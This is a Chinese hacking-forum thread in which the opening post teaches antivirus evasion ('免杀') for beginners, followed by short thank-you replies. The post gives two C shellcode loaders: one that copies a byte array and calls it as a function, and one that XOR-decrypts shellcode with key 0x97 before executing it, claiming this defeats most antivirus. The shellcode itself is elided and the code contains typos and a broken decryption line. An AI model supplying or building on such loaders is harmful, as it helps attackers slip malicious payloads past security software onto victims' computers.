资源共享吧|易语言论坛|逆向破解教程|辅助开发教程|网络安全教程|www.zygx8.com|我的开发技术随记

 找回密码
 注册成为正式会员
查看: 1852|回复: 6

[免杀] 零基础入门学免杀(一)

[复制链接]

5

主题

8

帖子

0

精华

新手上路

Rank: 1

资源币
15
积分
20
贡献
0
在线时间
2 小时
注册时间
2020-2-21
最后登录
2020-5-3
发表于 2020-2-21 20:25:02 | 显示全部楼层 |阅读模式
零基础入门学免杀(一)

目前有很多利用shellcode自动免杀的工具,但是这些工具的指纹有相似的
如果有人传到网上扫描被杀或者工具过时怎么办?
这时你就需要自己制作免杀了
最简单的就是shellcode加密直接生成可执行文件

直接生成shellcode、
有时候shellcode是直接可以免杀的  但是有的时候是会被杀的

1.png

一:无加密直接自己生成可执行文件
分配一些内存,拷贝字符数组到分配的内存中,最后执行它


#include"stdafx.h"
/* length: 798 bytes*/
unsigned charshellcode[] = “\xfc\xe8\x89\x00\......”//这里写shellcode

int main(intargc, char* argv[])
{
       ((void(*)(void))&shellcode)();
       return 0;
}

2.png

直接生成有时候能过一部分杀毒



二:加密shellcode生成可执行文件

加密的方式有很多,可以加密一次也可以多次加密,我用异或加密演示给大家看

首先把自己的shellcode进行异或加密一次,然后把加密的代码解密执行。

我这里把shellcode和0x97异或加密过后解密执行

#include "stdafx.h"
#include <windows.h>
#define KEY 0x97     //进行异或的字符
/* length: 798 bytes */
unsigned char buf[] =
"\x6b\x7f\x1e\x97\x97\”   这里输入你自己加密过后的shellcode
int main(int argc, char* argv[])
{
  unsigned char c[sizeof(buf)];   //获取shellcode长度
  for (int i = 0; i < sizeof(buf)-1; i++)
  {
    c = buf ^ KEY;//进行解密
  }


  ( (void(*)(void))&c)(); 执行shellcode
  return 0;
}


3.png


这个方法目前可以过掉大部分杀毒

4.png


5.png

















回复

使用道具 举报

1

主题

10

帖子

0

精华

新手上路

Rank: 1

资源币
4
积分
11
贡献
0
在线时间
1 小时
注册时间
2020-2-28
最后登录
2020-5-7
发表于 2020-2-28 13:11:38 | 显示全部楼层
我看不错噢 谢谢楼主!
回复 支持 反对

使用道具 举报

9

主题

369

帖子

0

精华

终身高级VIP会员

Rank: 7Rank: 7Rank: 7

资源币
216
积分
395
贡献
0
在线时间
145 小时
注册时间
2020-2-21
最后登录
2023-11-4

终身VIP会员

发表于 2020-3-23 23:34:02 | 显示全部楼层
楼主雷锋啊,谢谢分享
回复 支持 反对

使用道具 举报

7

主题

212

帖子

0

精华

终身高级VIP会员

Rank: 7Rank: 7Rank: 7

资源币
349
积分
670
贡献
0
在线时间
98 小时
注册时间
2016-9-27
最后登录
2023-5-10

终身VIP会员

发表于 2020-6-22 21:04:04 | 显示全部楼层
感谢分享,感觉很实用
回复 支持 反对

使用道具 举报

0

主题

61

帖子

0

精华

注册会员

Rank: 2

资源币
19
积分
61
贡献
0
在线时间
9 小时
注册时间
2020-3-2
最后登录
2020-7-13
发表于 2020-7-11 09:38:35 | 显示全部楼层
楼主,我太崇拜你了!
回复 支持 反对

使用道具 举报

3

主题

229

帖子

0

精华

终身高级VIP会员

Rank: 7Rank: 7Rank: 7

资源币
41
积分
235
贡献
0
在线时间
34 小时
注册时间
2020-6-12
最后登录
2022-11-7

终身VIP会员

发表于 2020-7-29 14:28:54 | 显示全部楼层
回复

使用道具 举报

2

主题

172

帖子

0

精华

资源共享吧豪华贵族SVIP

Rank: 9Rank: 9Rank: 9

资源币
7
积分
174
贡献
0
在线时间
18 小时
注册时间
2022-9-21
最后登录
2023-4-20

终身VIP会员

发表于 2023-4-10 20:15:24 | 显示全部楼层
6
回复

使用道具 举报

 点击右侧快捷回复  

本版积分规则

小黑屋|资源共享吧 ( 琼ICP备2021005790号-1 )

GMT+8, 2024-4-26 05:15 , Processed in 0.065490 second(s), 15 queries , MemCached On.

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表